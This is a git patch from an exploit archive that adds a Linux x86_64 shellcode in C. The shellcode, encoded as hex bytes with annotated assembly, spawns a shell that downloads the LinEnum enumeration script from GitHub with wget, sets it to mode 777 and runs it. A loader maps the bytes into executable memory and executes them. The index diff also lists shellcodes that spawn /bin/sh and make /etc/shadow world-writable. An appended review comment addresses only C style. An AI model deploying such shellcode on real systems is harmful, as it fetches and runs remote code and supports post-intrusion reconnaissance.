From 5c06a41d94700873b122e57c2e6304d8e4c16bc2 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 24 Jul 2019 05:02:23 +0000
Subject: [PATCH] DB: 2019-07-24

1 changes to exploits/shellcodes

Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)
---
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86-64/47151.c | 66 +++++++++++++++++++++++++++++++++
 2 files changed, 67 insertions(+)
 create mode 100644 shellcodes/linux_x86-64/47151.c

diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index edd836b99..0c7cfaa3a 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -988,3 +988,4 @@ id,file,description,date,author,type,platform
 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
+47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/47151.c b/shellcodes/linux_x86-64/47151.c
new file mode 100644
index 000000000..02b6a80bc
--- /dev/null
+++ b/shellcodes/linux_x86-64/47151.c
@@ -0,0 +1,66 @@
+/*
+LinEnum (Linux Enumeration) Wget & CHMOD & Run Shellcode Language C & ASM - Linux/x86_64
+
+author : Kağan Çapar
+contact: kagancapar@gmail.com
+shellcode len : 155 bytes
+compilation: gcc -o shellcode shellcode.c
+
+test:
+run ./shellcode
+
+description: First, the linenum script is via github with wget command. After change mod 777 and run!
+
+assembly:
+
+_start:
+push 0x3b {var_8} {"content.com/rebootuser/LinEnum/m…"}
+pop rax {var_8} {0x3b, "content.com/rebootuser/LinEnum/m…"}
+cdq {0x3b, "content.com/rebootuser/LinEnum/m…"} {0x0} {0x3b, "content.com/rebootuser/LinEnum/m…"}
+mov rbx, 0x68732f6e69622f
+push rbx {var_8} {0x68732f6e69622f}
+mov rdi, rsp {var_8}
+push 0x632d {var_10}
+mov rsi, rsp {var_10}
+push rdx {var_18} {0x0}
+call sub_94 {sub_20, "wget https://raw.githubuserconte…"} { Falls through into sub_20 }
+
+*/
+
+#include
+#include
+#include
+#include
+
+int (*sc)();
+
+char library[] =
+"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
+"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x74\x00"
+"\x00\x00\x77\x67\x65\x74\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f"
+"\x72\x61\x77\x2e\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63"
+"\x6f\x6e\x74\x65\x6e\x74\x2e\x63\x6f\x6d\x2f\x72\x65\x62\x6f"
+"\x6f\x74\x75\x73\x65\x72\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2f"
+"\x6d\x61\x73\x74\x65\x72\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2e"
+"\x73\x68\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x37\x37\x37"
+"\x20\x4c\x69\x6e\x45\x6e\x75\x6d\x2e\x73\x68\x20\x26\x26\x20"
+"\x2e\x2f\x4c\x69\x6e\x45\x6e\x75\x6d\x2e\x73\x68\x00\x56\x57"
+"\x48\x89\xe6\x0f\x05";
+
+int main(int argc, char **argv) {
+ printf("library Length: %zd Bytes\n", strlen(library));
+
+ void *ptr = mmap(0, 0x100, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+
+ if (ptr == MAP_FAILED) {
+ perror("mmap");
+ exit(-1);
+ }
+
+ memcpy(ptr, library, sizeof(library));
+ sc = ptr;
+
+ sc();
+
+ return 0;
+}
\ No newline at end of file
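Review bot: `printf("library Length: %zd Bytes\n", strlen(library));` passes a `size_t` to `%zd`, which is the signed `ssize_t` conversion; the matching specifier is `%zu`, because a mismatched conversion is undefined behaviour even when it happens to print correctly for small values. `exit(-1)` in the `MAP_FAILED` branch produces exit status 255 after truncation to eight bits; `exit(EXIT_FAILURE)` states the intent directly. The four `#include` directives in the hunk carry no header name, which looks like the angle-bracketed names were stripped when the page was rendered rather than missing from the committed file, but it is worth confirming against the raw file since the unit as shown does not compile. `int (*sc)();` is an unprototyped declaration; `int (*sc)(void);` keeps the file clean under `-Wstrict-prototypes`.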